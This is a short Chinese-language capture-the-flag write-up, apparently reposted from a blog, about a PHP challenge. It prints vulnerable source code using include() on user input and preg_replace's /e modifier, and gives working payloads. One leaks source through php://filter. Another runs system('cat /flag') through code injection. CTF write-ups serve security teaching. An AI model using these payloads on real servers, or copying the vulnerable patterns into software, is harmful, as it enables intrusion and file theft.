标签:session lang lan repo 知识点 each res amp complex
知识点:
preg_replace()使用的/e模式可以存在远程执行代码
解析见链接:https://xz.aliyun.com/t/2557
看题目
首先是一段源代码:
<?php
error_reporting(0);
$text = $_GET["text"];
$file = $_GET["file"];
if(isset($text)&&(file_get_contents($text,‘r‘)==="I have a dream")){
echo "<br><h1>".file_get_contents($text,‘r‘)."</h1></br>";
if(preg_match("/flag/",$file)){
die("Not now!");
}
include($file); //next.php
}
else{
highlight_file(__FILE__);
}
?>
text是PHP的DATA伪协议 file是PHP的filter伪协议
payload:
?text=data://text/plain,I have a dream&file=php://filter/convert.base64-encode/resource=next.php
得到第二段源代码:
<?php
$id = $_GET[‘id‘];
$_SESSION[‘id‘] = $id;
function complex($re, $str) {
return preg_replace(
‘/(‘ . $re . ‘)/ei‘,
‘strtolower("\\1")‘,
$str
);
}
foreach($_GET as $re => $str) {
echo complex($re, $str). "\n";
}
function getFlag(){
@eval($_GET[‘cmd‘]);
}
payload如下:
next.php?\S*=${getflag()}&cmd=system(‘cat /flag‘);
标签:session lang lan repo 知识点 each res amp complex
原文地址:https://www.cnblogs.com/buchuo/p/12941718.html